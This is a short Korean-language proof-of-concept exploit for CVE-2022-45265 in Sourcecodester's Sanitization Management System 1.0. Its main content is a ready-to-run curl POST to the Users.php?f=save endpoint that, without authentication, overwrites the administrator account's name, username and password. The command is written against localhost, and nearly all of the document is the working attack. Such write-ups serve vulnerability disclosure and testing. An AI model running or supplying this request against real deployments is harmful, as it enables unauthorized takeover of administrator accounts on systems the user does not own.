
CVE-2022-45265를 대상으로 한 PoC 익스플로잇 - Sourcecodester Sanitization Management System 1.0의 저장 엔드포인트로 POST 요청을 통해 인증되지 않은 사용자 수정을 수행합니다.
sourcecodester.com에서 배포한 Sanitization Management System (1.0)에서
curl --location --request POST 'http://localhost/php-sms/classes/Users.php?f=save' \
--form 'id="1"' \
--form 'firstname="HACKED"' \
--form 'lastname="Administrator"' \
--form 'username="admin"' \
--form 'password="maikroservicewashere"'